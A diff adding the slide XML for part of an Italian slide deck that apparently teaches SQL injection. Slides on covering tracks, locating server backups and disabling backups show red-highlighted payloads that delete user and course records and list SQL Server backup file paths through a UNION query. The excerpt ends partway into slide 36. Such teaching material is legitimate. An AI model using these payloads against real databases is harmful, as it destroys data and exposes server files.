+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Coprire</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> le </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>proprie</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>tracce</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28B8EFA-2249-C665-5F5C-FDC45E80FD29}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4D5A63-6896-0F75-994E-CAA72275A31A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'; DELETE FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> IN (SELECT Id FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> WHERE Email = 'pippo@disney.com'); DELETE FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> WHERE Email = 'pippo@disney.com';--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751677404"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D088E20-8A21-173F-97BF-AE0FFABA34DF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9CE168-F2C0-AFE6-50D6-3D6C6559B5E9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> backup </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>dei</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> database del server</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B866514A-43EE-105A-8743-47E0B02E90E5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74DCF03-0F8A-B339-2F22-241E946B3DCB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, STRING_AGG(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>physical_device_name</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, '; '), NULL, NULL, NULL, NULL FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>msdb.dbo.backupmediafamily</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> GROUP BY </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>media_set_id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> ORDER BY 2;--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2250290460"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2261BE6-231D-00C1-8BE4-09FAAB65F092}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCFECB07-BD25-1BB0-3CBC-99BC37D80D17}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Rendere</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>inutilizzabili</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> backup</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91EC2C8-9A30-AC61-0011-C9A534195930}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{666FACCF-5F3E-11B9-D22D-F2A2E0523C22}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
